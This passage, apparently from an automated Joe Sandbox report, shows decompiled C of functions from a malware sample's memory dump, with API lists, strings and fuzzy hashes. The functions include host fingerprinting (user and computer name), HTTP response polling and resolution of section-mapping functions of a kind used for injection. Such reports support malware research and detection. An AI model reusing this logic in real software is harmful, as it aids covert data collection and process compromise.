Part of subcall function 047E127E: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 047E12A9

GetModuleHandleA.KERNEL32(4E52454B,05428E14,73797325), ref: 047E387F
GetProcAddress.KERNEL32(00000000), ref: 047E3886
HeapFree.KERNEL32(00000000,00000000), ref: 047E38EE

Part of subcall function 047E5B56: GetProcAddress.KERNEL32(36776F57,047E2425), ref: 047E5B71

CloseHandle.KERNEL32(00000000,00000001), ref: 047E38CB
CloseHandle.KERNEL32(?), ref: 047E38D0
GetLastError.KERNEL32(00000001), ref: 047E38D4

Strings

@MetNet, xrefs: 047E38D4
Uet, xrefs: 047E38EE

Memory Dump Source

Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_47e0000_server.jbxd

Similarity

API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
String ID: Uet$@MetNet
API String ID: 3075724336-1616585941
Opcode ID: 37a70927e899804c2665bb0a0564ded16c4102f6741edbf5a0ad0f77eef7d1e7
Instruction ID: 9eaa990b753494d6a9a659fc8e95d3ec5d7d13cfe6a3cdc964ef0af67ddc68d6
Opcode Fuzzy Hash: 37a70927e899804c2665bb0a0564ded16c4102f6741edbf5a0ad0f77eef7d1e7
Instruction Fuzzy Hash: 9D3114B2900209AFDB10EFE6DC88DEE7BBCEB0C318F114665E605A7211D735AD45DB60

Uniqueness

Uniqueness Score: -1.00%

Function 047E3FA5 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 92
networksynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E047E3FA5(void* __ecx, void* __esi) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				void* _t58;
				void* _t59;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_v8 = 4;
						_v16 = 0;
						if(HttpQueryInfoA( *(_t61 + 0x18), 0x20000013, _t61 + 0x2c,  &_v8,  &_v16) == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *(_t61 + 0x2c) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							HttpQueryInfoA( *(_t61 + 0x18), 0x16, 0,  &_v8,  &_v16);
							_t58 = E047E33DC(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								if(HttpQueryInfoA( *(_t61 + 0x18), 0x16, _t58,  &_v8,  &_v16) == 0) {
									E047E61DA(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *(_t61 + 0xc) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E047E16B2( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}

0x047e3fa5
0x047e3fa5
0x047e3fb5
0x047e3fb8
0x047e3fbc
0x047e3fc2
0x047e3fc7
0x047e3fe0
0x047e3ff4
0x047e3ffb
0x047e4002
0x047e4055
0x047e405b
0x047e4061
0x047e409c
0x047e40a2
0x00000000
0x00000000
0x00000000
0x047e4061
0x047e4008
0x00000000
0x047e400f
0x047e401d
0x047e4020
0x047e4023
0x047e402f
0x047e4033
0x047e4095
0x047e4035
0x047e4047
0x047e4085
0x047e4090
0x047e4049
0x047e404c
0x047e4050
0x047e4050
0x047e4047
0x00000000
0x047e4033
0x047e4008
0x047e3fcc
0x047e3fd2
0x047e3fd5
0x047e3fda
0x00000000
0x00000000
0x00000000
0x047e406a
0x047e4072
0x047e4077
0x047e407a
0x00000000

APIs

WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,746981D0,00000000,00000000), ref: 047E3FBC
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,047E3F34,00000000,?), ref: 047E3FCC
HttpQueryInfoA.WININET(?,20000013,?,?), ref: 047E3FFE
HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 047E4023
HttpQueryInfoA.WININET(?,00000016,00000000,00000004,?), ref: 047E4043
GetLastError.KERNEL32 ref: 047E4055

Part of subcall function 047E16B2: WaitForMultipleObjects.KERNEL32(00000002,047E7C47,00000000,047E7C47,?,?,?,047E7C47,0000EA60), ref: 047E16CD

Part of subcall function 047E61DA: RtlFreeHeap.NTDLL(00000000,00000000,047E6383,00000000,?,00000000,00000000), ref: 047E61E6

GetLastError.KERNEL32(00000000), ref: 047E408A

Strings

@MetNet, xrefs: 047E4055, 047E408A

Memory Dump Source

Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_47e0000_server.jbxd

Similarity

API ID: HttpInfoQuery$ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
String ID: @MetNet
API String ID: 3369646462-2109406137
Opcode ID: cdf6af6cc6283e9c8304c5f58e09e78178eaaad09d40bd103c6918e82e558042
Instruction ID: 79bc4c1de8bc77a27c382f220062e726ffb38474ae8290ff618956c9e781b993
Opcode Fuzzy Hash: cdf6af6cc6283e9c8304c5f58e09e78178eaaad09d40bd103c6918e82e558042
Instruction Fuzzy Hash: 0E3100B5D00309EFDB21DFE6CC849AEB7B8EB4C304F104AB9E642A6641D775AA449F50

Uniqueness

Uniqueness Score: -1.00%

Function 047E7238 Relevance: 13.6, APIs: 9, Instructions: 145
stringCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E047E7238(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				signed int _v28;
				intOrPtr _v32;
				void* __edi;
				void* __esi;
				intOrPtr _t58;
				signed int _t60;
				signed int _t62;
				intOrPtr _t64;
				intOrPtr _t66;
				intOrPtr _t70;
				void* _t72;
				void* _t75;
				void* _t76;
				intOrPtr _t80;
				WCHAR* _t83;
				void* _t84;
				void* _t85;
				void* _t86;
				intOrPtr _t92;
				intOrPtr* _t102;
				signed int _t103;
				void* _t104;
				intOrPtr _t105;
				void* _t107;
				intOrPtr* _t115;
				void* _t119;
				intOrPtr _t125;

				_t58 =  *0x47ea3dc; // 0x5429ca8
				_v24 = _t58;
				_v28 = 8;
				_v20 = GetTickCount();
				_t60 = E047E6ABD();
				_t103 = 5;
				_t98 = _t60 % _t103 + 6;
				_t62 = E047E6ABD();
				_t117 = _t62 % _t103 + 6;
				_v32 = _t62 % _t103 + 6;
				_t64 = E047E42E9(_t60 % _t103 + 6);
				_v16 = _t64;
				if(_t64 != 0) {
					_t66 = E047E42E9(_t117);
					_v12 = _t66;
					if(_t66 != 0) {
						_push(5);
						_t104 = 0xa;
						_t119 = E047E398D(_t104,  &_v20);
						if(_t119 == 0) {
							_t119 = 0x47e918c;
						}
						_t70 = E047E5FA1(_v24);
						_v8 = _t70;
						if(_t70 != 0) {
							_t115 = __imp__;
							_t72 =  *_t115(_t119);
							_t75 =  *_t115(_v8);
							_t76 =  *_t115(_a4);
							_t80 = E047E33DC(lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76 + lstrlenW(_a8) + _t72 + _v32 + _t98 + _t72 + _v32 + _t98 + 0xbc + _t75 + _t76);
							_v24 = _t80;
							if(_t80 != 0) {
								_t105 =  *0x47ea348; // 0xc3d5a8
								_t102 =  *0x47ea138; // 0x47e7ddd
								_t28 = _t105 + 0x47ebd10; // 0x530025
								 *_t102(_t80, _t28, _t119, _t119, _v16, _v12, _v12, _v16, _a4, _v8, _a8);
								_push(4);
								_t107 = 5;
								_t83 = E047E398D(_t107,  &_v20);
								_a8 = _t83;
								if(_t83 == 0) {
									_a8 = 0x47e9190;
								}
								_t84 =  *_t115(_a8);
								_t85 =  *_t115(_v8);
								_t86 =  *_t115(_a4);
								_t125 = E047E33DC(lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + lstrlenW(_a12) + _t84 + _t84 + _t85 + _t86 + 0x13a);
								if(_t125 == 0) {
									E047E61DA(_v24);
								} else {
									_t92 =  *0x47ea348; // 0xc3d5a8
									_t44 = _t92 + 0x47eba20; // 0x73006d
									 *_t102(_t125, _t44, _a8, _a8, _a4, _v8, _a12);
									 *_a16 = _v24;
									_v28 = _v28 & 0x00000000;
									 *_a20 = _t125;
								}
							}
							E047E61DA(_v8);
						}
						E047E61DA(_v12);
					}
					E047E61DA(_v16);
				}
				return _v28;
			}

0x047e723e
0x047e7246
0x047e7249
0x047e7256
0x047e7259
0x047e7260
0x047e7267
0x047e726a
0x047e7277
0x047e727a
0x047e727d
0x047e7282
0x047e7287
0x047e728f
0x047e7294
0x047e7299
0x047e729f
0x047e72a3
0x047e72ac
0x047e72b0
0x047e72b2
0x047e72b2
0x047e72ba
0x047e72bf
0x047e72c4
0x047e72ca
0x047e72d1
0x047e72e2
0x047e72e9
0x047e72fb
0x047e7300
0x047e7305
0x047e730e
0x047e7317
0x047e7320
0x047e7336
0x047e733b
0x047e733f
0x047e7343
0x047e7348
0x047e734d
0x047e734f
0x047e734f
0x047e7359
0x047e7362
0x047e7369
0x047e7385
0x047e7389
0x047e73c2
0x047e738b
0x047e738e
0x047e7396
0x047e73a7
0x047e73af
0x047e73b7
0x047e73bb
0x047e73bb
0x047e7389
0x047e73ca
0x047e73ca
0x047e73d2
0x047e73d2
0x047e73da
0x047e73da
0x047e73e6

APIs

GetTickCount.KERNEL32 ref: 047E7250
lstrlen.KERNEL32(00000000,00000005), ref: 047E72D1
lstrlen.KERNEL32(?), ref: 047E72E2
lstrlen.KERNEL32(00000000), ref: 047E72E9
lstrlenW.KERNEL32(80000002), ref: 047E72F0
lstrlen.KERNEL32(?,00000004), ref: 047E7359
lstrlen.KERNEL32(?), ref: 047E7362
lstrlen.KERNEL32(?), ref: 047E7369
lstrlenW.KERNEL32(?), ref: 047E7370

Part of subcall function 047E61DA: RtlFreeHeap.NTDLL(00000000,00000000,047E6383,00000000,?,00000000,00000000), ref: 047E61E6

Memory Dump Source

Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_47e0000_server.jbxd

Similarity

API ID: lstrlen$CountFreeHeapTick
String ID:
API String ID: 2535036572-0
Opcode ID: e80bec0363692fd2f500eb56d9b0648d7ef5b0040af2c4e39f335f8cf57d4dea
Instruction ID: 0e09e0a169d7d5512d3e5ca910c21e8077498525116e11e41b9bf9b378a643e4
Opcode Fuzzy Hash: e80bec0363692fd2f500eb56d9b0648d7ef5b0040af2c4e39f335f8cf57d4dea
Instruction Fuzzy Hash: AF516472D00119ABDF12AFA6DC48DEE7BB5EF48318F058125EE04AB310D735EA11DB94

Uniqueness

Uniqueness Score: -1.00%

Function 047E1340 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E047E1340() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_t11 = _t43 + 2; // 0x76b5c742
						_v12 = _v12 + _t11;
						_t64 = E047E33DC(_v12 + _t11 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E047E61DA(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x47e3e01
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}

0x047e134e
0x047e1351
0x047e1354
0x047e135a
0x047e135f
0x047e1365
0x047e136d
0x047e1370
0x047e1376
0x047e137b
0x047e1384
0x047e1388
0x047e1395
0x047e1399
0x047e139b
0x047e139f
0x047e13a2
0x047e13b2
0x047e1405
0x047e1406
0x047e13b4
0x047e13b9
0x047e13ba
0x047e13bf
0x047e13c2
0x047e13d5
0x00000000
0x047e13d7
0x047e13da
0x047e13df
0x047e13ed
0x047e13f0
0x047e13f6
0x047e13fb
0x00000000
0x047e13fd
0x047e13fd
0x047e1400
0x047e1400
0x047e13fb
0x047e13d5
0x047e140b
0x047e140c
0x047e137b
0x047e1412

APIs

GetUserNameW.ADVAPI32(00000000,047E3DFF), ref: 047E1354
GetComputerNameW.KERNEL32(00000000,047E3DFF), ref: 047E1370

Part of subcall function 047E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,047E62F6), ref: 047E33E8

GetUserNameW.ADVAPI32(00000000,047E3DFF), ref: 047E13AA
GetComputerNameW.KERNEL32(047E3DFF,76B5C740), ref: 047E13CD
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,047E3DFF,00000000,047E3E01,00000000,00000000,?,76B5C740,047E3DFF), ref: 047E13F0

Strings

@het, xrefs: 047E13F0

Memory Dump Source

Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_47e0000_server.jbxd

Similarity

API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
String ID: @het
API String ID: 3850880919-3010869118
Opcode ID: e88a2e8ba4d390cf6571d1043efbd1e1b35583233cf1fac6d5a9809c24931ef7
Instruction ID: 17df68f5571225e6dc3d45f1f95cb3f4cf2d2500582515699c767840155e7fc0
Opcode Fuzzy Hash: e88a2e8ba4d390cf6571d1043efbd1e1b35583233cf1fac6d5a9809c24931ef7
Instruction Fuzzy Hash: D321F8B6900108FFDB11DFE6C9858EEBBB8EF48304B5045AAE501E7240DB34AB45DB60

Uniqueness

Uniqueness Score: -1.00%

Function 047E54D8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E047E54D8(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x47ea30c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x47ea2fc = _t4;
					_t6 = GetCurrentProcessId();
					 *0x47ea2f8 = _t6;
					 *0x47ea304 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x47ea2f4 = _t7;
					if(_t7 == 0) {
						 *0x47ea2f4 =  *0x47ea2f4 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}

0x047e54e0
0x047e54e6
0x047e54ed
0x00000000
0x047e5547
0x047e54ef
0x047e54f7
0x047e5504
0x047e5504
0x047e5544
0x00000000
0x047e5544
0x047e5506
0x047e5506
0x047e550b
0x047e551d
0x047e5522
0x047e5528
0x047e552e
0x047e5535
0x047e5537
0x047e5537
0x00000000
0x047e553e
0x047e5500
0x00000000
0x00000000
0x047e5502
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,047E5037,?), ref: 047E54E0
GetVersion.KERNEL32 ref: 047E54EF
GetCurrentProcessId.KERNEL32 ref: 047E550B
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 047E5528
GetLastError.KERNEL32 ref: 047E5547

Strings

@MetNet, xrefs: 047E5547

Memory Dump Source

Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_47e0000_server.jbxd

Similarity

API ID: Process$CreateCurrentErrorEventLastOpenVersion
String ID: @MetNet
API String ID: 2270775618-2109406137
Opcode ID: 307326dcb48ece887454c841670ec425793a61845db9da514893cf2a208f6929
Instruction ID: 978bfaee379e97490858d48cca84e4f1f2218be8e2b326a7f662dbfcd9e81293
Opcode Fuzzy Hash: 307326dcb48ece887454c841670ec425793a61845db9da514893cf2a208f6929
Instruction Fuzzy Hash: 3EF081F4640307ABD7208B63A919BA43B67E74C759F508B19E613EE2C0E6789880CB15

Uniqueness

Uniqueness Score: -1.00%

Function 047E3A63 Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 047E3ABD
SysAllocString.OLEAUT32(0070006F), ref: 047E3AD1
SysAllocString.OLEAUT32(00000000), ref: 047E3AE3
SysFreeString.OLEAUT32(00000000), ref: 047E3B4B
SysFreeString.OLEAUT32(00000000), ref: 047E3B5A
SysFreeString.OLEAUT32(00000000), ref: 047E3B65

Memory Dump Source

Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_47e0000_server.jbxd

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 29d382f5541011d12fc126e8f6037eaeb307dc6885f17f31520145e447f98c3b
Instruction ID: a53e816fbf38574f3a356ca047e142b117b62dcaa9ce21b1a4ec5c7aa57d8b81
Opcode Fuzzy Hash: 29d382f5541011d12fc126e8f6037eaeb307dc6885f17f31520145e447f98c3b
Instruction Fuzzy Hash: C1419176D00609ABDF01DFBDC844AAEB7BAEF49300F108526EE11EB210DA71ED05CB91

Uniqueness

Uniqueness Score: -1.00%

Function 047E6BF9 Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E047E6BF9(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E047E33DC(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x47ea348; // 0xc3d5a8
					_t1 = _t23 + 0x47eb436; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x47ea348; // 0xc3d5a8
					_t2 = _t26 + 0x47eb85c; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E047E61DA(_t54);
					} else {
						_t30 =  *0x47ea348; // 0xc3d5a8
						_t5 = _t30 + 0x47eb849; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x47ea348; // 0xc3d5a8
							_t7 = _t33 + 0x47eb72b; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x47ea348; // 0xc3d5a8
								_t9 = _t36 + 0x47eb883; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x47ea348; // 0xc3d5a8
									_t11 = _t39 + 0x47eb87b; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E047E7A08(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x047e6c08
0x047e6c0c
0x047e6cce
0x047e6c12
0x047e6c12
0x047e6c17
0x047e6c2a
0x047e6c2c
0x047e6c31
0x047e6c39
0x047e6c40
0x047e6c42
0x047e6c47
0x047e6cc6
0x047e6cc7
0x047e6c49
0x047e6c49
0x047e6c4e
0x047e6c56
0x047e6c58
0x047e6c5d
0x00000000
0x047e6c5f
0x047e6c5f
0x047e6c64
0x047e6c6c
0x047e6c6e
0x047e6c73
0x00000000
0x047e6c75
0x047e6c75
0x047e6c7a
0x047e6c82
0x047e6c84
0x047e6c89
0x00000000
0x047e6c8b
0x047e6c8b
0x047e6c90
0x047e6c98
0x047e6c9a
0x047e6c9f
0x00000000
0x047e6ca1
0x047e6ca7
0x047e6cac
0x047e6cb3
0x047e6cb8
0x047e6cbd
0x00000000
0x047e6cbf
0x047e6cc2
0x047e6cc2
0x047e6cbd
0x047e6c9f
0x047e6c89
0x047e6c73
0x047e6c5d
0x047e6c47
0x047e6cdc

APIs

Part of subcall function 047E33DC: RtlAllocateHeap.NTDLL(00000000,00000000,047E62F6), ref: 047E33E8

GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,047E37FB,?,?,?,?,00000000,00000000), ref: 047E6C1E
GetProcAddress.KERNEL32(00000000,7243775A), ref: 047E6C40
GetProcAddress.KERNEL32(00000000,614D775A), ref: 047E6C56
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 047E6C6C
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 047E6C82
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 047E6C98

Part of subcall function 047E7A08: memset.NTDLL ref: 047E7A87

Memory Dump Source

Source File: 00000000.00000002.524730509.00000000047E1000.00000020.10000000.00040000.00000000.sdmp, Offset: 047E0000, based on PE: true

Associated: 00000000.00000002.524718586.00000000047E0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524758346.00000000047E9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524765280.00000000047EA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.524783979.00000000047EC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_47e0000_server.jbxd

Similarity

API ID: AddressProc$AllocateHandleHeapModulememset
String ID:
API String ID: 1886625739-0
Opcode ID: 4af6684de9e92fb81e62661c58900d6f09ed846ffb5dc2e77a89b98bacccffcf
Instruction ID: b6cea81d8a52ee16158aeaca3f0a766a1a2748900f849960973526ae5ffbd698
Opcode Fuzzy Hash: 4af6684de9e92fb81e62661c58900d6f09ed846ffb5dc2e77a89b98bacccffcf
Instruction Fuzzy Hash: 9F212DB160070AAFD720DF6BC944EAABBECEB1C2447408615E505CB721E778F908CB60

Uniqueness

Uniqueness Score: -1.00%

Function 047E4C94 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E047E4C94(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				intOrPtr _t64;
				char _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x47ea3dc);
					_t91 = 0x80000002;
					L6:
					_t59 = E047E6536( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					if(E047E313F(_t92, _t97, _t101, _t91, _t59) != 0) {
						L27:
						E047E61DA(_a8);
						goto L29;
					}
					_t64 =  *0x47ea318; // 0x5429e00
					_t16 = _t64 + 0xc; // 0x5429f22
					_t65 = E047E6536(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d047e90
						if(E047E7767(_t97,  *_t33, _t91, _a8,  *0x47ea3d4,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
							_t68 =  *0x47ea348; // 0xc3d5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x47ebb5a; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x47ebbac; // 0x55434b48
								_t69 = _t34;
							}
							if(E047E7238(_t69,  *0x47ea3d4,  *0x47ea3d8,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x47ea348; // 0xc3d5a8
									_t44 = _t71 + 0x47eb332; // 0x74666f53
									_t73 = E047E6536(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d047e90
										E047E5B0E( *_t47, _t91, _a8,  *0x47ea3d8, _a24);
										_t49 = _t101 + 0x10; // 0x3d047e90
										E047E5B0E( *_t49, _t91, _t99,  *0x47ea3d0, _a16);
										E047E61DA(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d047e90
									E047E5B0E( *_t40, _t91, _a8,  *0x47ea3d8, _a24);
									_t43 = _t101 + 0x10; // 0x3d047e90
									E047E5B0E( *_t43, _t91, _a8,  *0x47ea3d0, _a16);
								}
								if( *_t101 != 0) {
									E047E61DA(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d047e90
